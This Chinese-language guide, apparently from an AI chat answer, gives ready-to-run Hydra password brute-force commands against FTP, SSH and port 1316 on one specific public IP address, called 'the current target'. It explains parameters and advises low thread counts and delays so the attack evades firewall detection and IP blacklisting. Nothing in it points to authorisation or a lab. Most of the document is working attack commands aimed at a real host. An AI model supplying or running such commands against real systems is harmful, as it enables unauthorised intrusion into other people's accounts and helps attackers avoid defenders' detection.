整理一份Hydra 弱口令爆破的详细命令模板,包含 FTP、SSH 等常见服务,还附参数说明和实操注意事项,直接就能用!
一、 Hydra 核心参数说明
先搞懂基础参数,才能灵活调整命令:
-l:指定单个用户名 ,比如root、admin-L:指定用户名字典文件,适合批量枚举-p:指定单个密码-P:指定密码字典文件 ,Kali 默认字典路径:/usr/share/wordlists/-vV:显示详细爆破过程,方便排查问题-o:将爆破结果保存到指定文件,比如-o result.txt-t:设置并发线程数,默认 16,建议 5-20(太高容易被防火墙拦截)service://target:port:指定目标服务、IP 和端口
二、 针对当前目标的实战命令
1. FTP 服务爆破(21 端口)
-
单个用户名 + 密码字典
bash
运行
hydra -l root -P /usr/share/wordlists/rockyou.txt -vV -t 10 ftp://154.85.57.105:21 -o ftp_brute_result.txt -
用户名字典 + 密码字典 (覆盖更多可能性)
bash
运行
hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt -vV -t 8 ftp://154.85.57.105:21没有
usernames.txt的话,可手动创建,写入root、admin、ftp、test等常见用户名。
2. SSH 服务爆破(22 端口)
SSH 爆破容易触发防火墙封禁,建议降低线程数、增加延迟:
bash
运行
hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt -vV -t 5 -w 3 ssh://154.85.57.105:22
参数补充:-w 3 表示每个尝试等待 3 秒,降低被检测风险。
3. 1316 冷门端口尝试(可选)
如果后续确认 1316 端口是某种登录服务,可尝试通用爆破:
bash
运行
hydra -l root -P /usr/share/wordlists/rockyou.txt -vV -t 3 154.85.57.105 -s 1316 <服务名>
这里的<服务名>需要根据后续探测结果替换,比如telnet、http-get等。
三、 实操注意事项
- 爆破前建议先确认服务是否允许密码登录,比如 SSH 可能只开密钥认证,爆破会白费功夫。
- Kali 默认的
rockyou.txt字典需要解压,命令:gzip -d /usr/share/wordlists/rockyou.txt.gz。 - 目标有防火墙,爆破频率别太高,线程数控制在 5-10 之间,避免 IP 被拉黑。